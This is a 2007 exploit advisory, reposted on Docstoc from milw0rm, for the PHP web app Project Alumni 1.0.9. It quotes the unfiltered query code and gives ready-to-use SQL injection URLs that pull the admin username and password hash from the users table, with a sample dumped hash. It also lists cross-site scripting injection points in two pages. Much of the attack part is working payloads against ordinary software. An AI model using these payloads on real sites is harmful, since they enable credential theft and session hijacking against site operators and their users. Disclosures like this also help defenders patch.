Docstoc

project alumni 1.0.9 Remote XSS SQL Injection Vulnerability

Document Sample
project alumni 1.0.9 Remote XSS SQL Injection Vulnerability Powered By Docstoc
					                          project alumni 1.0.9 Remote XSS SQL Injection Vulnerability                             Page 1/2
   1   project−alumni sql injection & xss
   2   author : tomplixsee
   3   tomplixsee@yahoo.co.id
   4
   5   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
   6   affected software version       : project alumni v1.0.9, v1.0.8, or lower??
   7   download                        : https://sourceforge.net/projects/project−alumni/
   8
   9
  10   vulnerability
  11   =============
  12
  13   1.sql injection
  14   ++++++++++++++++
  15   condition: magic_quotes_gpc = off
  16
  17   vulnerable code on view.page.inc.php:
  18   $result = dbQuery("SELECT * FROM ‘".getConfigVal("sqlTablePrefix",2)."_users‘ WHERE ‘alumniYear‘ = ’".$_GET[’year’]."
       ’");
  19
  20   reason: bad filtering
  21   exploit:
  22   http://victim/path/index.php?act=view&year=2003’ union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1
       ,1,1,1,1 from alumni_users where ID=’1
  23
  24   result example:
  25   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  26    |      Name                                            |       Email            |
  27   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  28    |      tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |       Not Available              |
  29   +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− −−+−−−−−−−−−−−−−−−−
       −−−−−−−−−−−−−−−−−−−−−−−−−−+
  30   tomplixsee is admin’s username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin’s password.
  31
  32
  33   vulnerable code on news.page.inc.php
  34   $result = dbQuery("SELECT * FROM ‘".getConfigVal("sqlTablePrefix",2)."_class_news‘ WHERE ‘year‘ = ’".$_GET[’year’]."’
       ");
  35
  36   reason: bad filtering
  37   exploit:
  38   http://victim/path/index.php?act=news&year=2003’ union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where
       ID=’1
  39
  40   2.xss
  41   ++++++
  42   vulnerable code:
  43
  44   ________________________________________________________________________________
  45   #/xml/index.php                                                                 #
tomplixsee                                                                                                         11/24/2007
                       project alumni 1.0.9 Remote XSS SQL Injection Vulnerability              Page 2/2
  46   #                                                                                #
  47   #        <?php                                                                   #
  48   #        if(isset($_GET["year"])){                                               #
  49   #                $year = $_GET["year"];                                          #
  50   #        }                                                                       #
  51   #        if($year==’FRND’)                                                       #
  52   #                $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";   #
  53   #        else                                                                    #
  54   #                $yearText = "Class of $year";                                   #
  55   #        ?>                                                                      #
  56   #        .....                                                                   #
  57   #        <?php echo"$yearText";?>                                                #
  58   #        .....                                                                   #
  59   #                                                                                #
  60   #exploit:                                                                        #
  61   #http://victim/path/xml/index.php?year=<xss>                                     #
  62   #_______________________________________________________________________________#
  63   # view.page.inc.php                                                              #
  64   #                                                                                #
  65   #        <?php if(!$_GET[’year’]) { ?>                                           #
  66   #        ....                                                                    #
  67   #        <?php } else if ($_GET[’year’] < getConfigVal("alumniStartYear",2)) { ?>#
  68   #        ....                                                                    #
  69   #        <?php } else { ?>                                                       #
  70   #        <h2>Alumni for the Graduating Year of <?php echo $_GET[’year’] ?></h2> #
  71   #                                                                                #
  72   #exploit                                                                         #
  73   #http://victim/path/index.php?act=view&year=<xss>                                #
  74   #_______________________________________________________________________________#
  75
  76
  77   salam untuk:
  78   anak−anak jaringan sukabirus, teman−teman di stt telkom, komunitas jasakom,
  79   sibalbal, crutz_ao, bidulux, akillers 179...........
  80
  81   # milw0rm.com [2007−11−24]




tomplixsee                                                                                      11/24/2007